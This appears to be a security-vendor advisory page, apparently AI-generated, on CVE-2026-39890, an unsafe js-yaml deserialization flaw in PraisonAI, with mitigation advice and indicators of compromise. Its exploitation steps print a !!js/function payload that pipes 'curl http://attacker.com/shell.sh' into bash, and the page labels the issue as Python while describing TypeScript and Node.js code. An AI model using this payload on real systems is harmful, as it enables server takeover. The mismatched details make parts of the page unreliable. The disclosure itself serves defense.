CVE-2026-39890: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-39890 is a critical remote code execution (RCE) vulnerability in PraisonAI caused by unsafe YAML deserialization in the AgentService.loadAgentFromFile method. It affects all PraisonAI versions up to and including 4.5.114, with the fix introduced in version 4.5.115. The vulnerability was published on April 7, 2026, and added to the GitHub Advisory Database on April 8, 2026. It carries a CVSS v3.1 base score of 9.8 (Critical) (Github Advisory, GitHub Security Advisory).

Technical details

The root cause is classified as CWE-502 (Deserialization of Untrusted Data). The vulnerable code resides in src/agents/agent.service.ts at line 55, where the js-yaml library's load() function is invoked without specifying a safe schema (e.g., JSON_SCHEMA or DEFAULT_SAFE_SCHEMA), allowing dangerous YAML tags such as !!js/function and !!js/undefined to be processed. An attacker crafts a malicious YAML agent definition file embedding a !!js/function tag containing arbitrary JavaScript — for example, invoking Node.js's child_process.execSync() — and uploads it via the agent definition API endpoint. When loadAgentFromFile parses the file, the embedded function is evaluated immediately, resulting in server-side code execution with no authentication required if the endpoint is publicly accessible (Github Advisory, GitHub Security Advisory).

Impact

Successful exploitation grants an attacker arbitrary JavaScript execution on the server with the privileges of the PraisonAI process, resulting in high confidentiality, integrity, and availability impact. An unauthenticated attacker with network access to the API endpoint can achieve full server compromise, including exfiltration of sensitive data (API keys, model configurations, user data), modification or destruction of server files, and denial of service. The ability to spawn child processes also enables lateral movement within the hosting environment or cloud infrastructure (Github Advisory).

Exploitability

A proof-of-concept payload is publicly documented in the official GitHub Security Advisory, demonstrating exploitation via a !!js/function YAML tag that executes child_process.execSync(). As of the time of disclosure, there is no evidence of active in-the-wild exploitation or threat actor attribution, and no public exploit kit integration has been reported (Github Advisory). The EPSS score is approximately 0.375–0.555% (69th percentile), indicating a moderate relative probability of exploitation within 30 days. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Reconnaissance: Identify internet-facing PraisonAI instances running version 4.5.114 or earlier using network scanning tools (e.g., Shodan, Censys) or by probing the API endpoint for version disclosure.
  2. Craft malicious YAML payload: Create a YAML file containing a !!js/function tag with an embedded JavaScript payload, for example:
!!js/function >
  function(){
    require('child_process').execSync('curl http://attacker.com/shell.sh | bash')
  }
  1. Upload via API endpoint: Submit the malicious YAML file to the agent definition upload API endpoint that invokes AgentService.loadAgentFromFile (no authentication required if the endpoint is unprotected).
  2. Trigger YAML parsing: The server parses the uploaded file using js-yaml's unsafe load() function, which evaluates the embedded !!js/function tag.
  3. Achieve RCE: The JavaScript function executes on the server as the PraisonAI process, enabling reverse shell establishment, data exfiltration, or further lateral movement (Github Advisory, GitHub Security Advisory).

Indicators of compromise

  • Network: Unexpected outbound connections from the PraisonAI server to unknown external IPs or domains shortly after an agent definition file upload; HTTP POST requests to the agent definition upload API endpoint containing YAML content with !!js/function or !!js/undefined tags.
  • File System: Unexpected files created in world-writable directories (e.g., /tmp/pwned or similar artifacts); new scripts, web shells, or binaries written by the PraisonAI process; modified agent definition YAML files in the application directory.
  • Logs: Application logs showing YAML parsing errors or unexpected function evaluation events in agent.service.ts; access logs recording unusual POST requests to the agent upload endpoint from unfamiliar source IPs.
  • Process: Unusual child processes spawned by the Node.js PraisonAI process (e.g., sh, bash, curl, wget, python) visible via process monitoring tools; unexpected execSync or spawn calls in Node.js process traces.

Mitigation and workarounds

Upgrade PraisonAI to version 4.5.115 or later, which addresses the vulnerability by replacing the unsafe yaml.load() call with a safe schema-constrained alternative (PraisonAI Release). As an interim workaround, restrict network access to the agent definition upload API endpoint via firewall rules or authentication middleware, and validate that uploaded YAML files do not contain !!js/function or !!js/undefined tags before processing. In the application code, the fix involves passing a safe schema option: yaml.load(fileContent, { schema: yaml.JSON_SCHEMA }) (Github Advisory).

Community reactions

The vulnerability received coverage from The Hacker Wire, which published a dedicated article on the PraisonAI critical RCE via malicious YAML parsing (The Hacker Wire). Additional coverage appeared on newclawtimes.com, which grouped CVE-2026-39890 alongside related PraisonAI RCE issues (CVE-2026-39888) in a dual-vulnerability report. Community discussion was noted on Mastodon (infosec.exchange) and Bluesky, with security researchers highlighting the risk of unsafe YAML deserialization in AI agent frameworks as a growing attack surface.

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management